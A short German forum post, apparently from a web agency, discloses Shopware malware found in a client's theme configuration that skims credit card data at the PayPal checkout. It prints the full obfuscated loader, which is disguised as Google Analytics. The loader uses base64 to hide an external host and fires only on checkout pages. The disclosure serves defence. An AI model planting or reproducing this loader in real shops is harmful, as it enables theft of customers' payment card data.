Hi,
wir haben bei einem Kunden eine Shopware spezifische Malware entdeckt, welche auf uns unbekannte Weise in der Theme Konfiguration gelandet ist, und ein JS lädt welches wiederum beim Paypal Checkout eingreift und den Kunden statt auf Paypal auf eine eigene Maske innerhalb des Shops leitet um Kreditkartendaten abzugreifen. Aufgefallen ist es, da das Virenprogramm Eset die Malware erkannt hat.
Der schädliche Script sieht wie folgt aus. Ist quasi als Google Analytics script getarnt, und auch die Scripte die dadurch nachgeladen werden, sind als Trustedshops Script und GA getarnt und wird von folgender URL abgerufen.
webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js
(function(n,x,b,z,i,y,m,o){z['GoogleAnalyticsObjects']=o;y=i.createElement (x),n=i.getElementsByTagName(x)[0];if(b.href.match(new RegExp(atob(o)))){y.async=1;y.src='//'+z.atob(m);n.parentNode.insertBefore(y,n)}}) ('fu','script',window.location,window,document,'//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=');
Wir hoffen mit dem Beitrag einige Erfolge dieser Software verhindern zu können.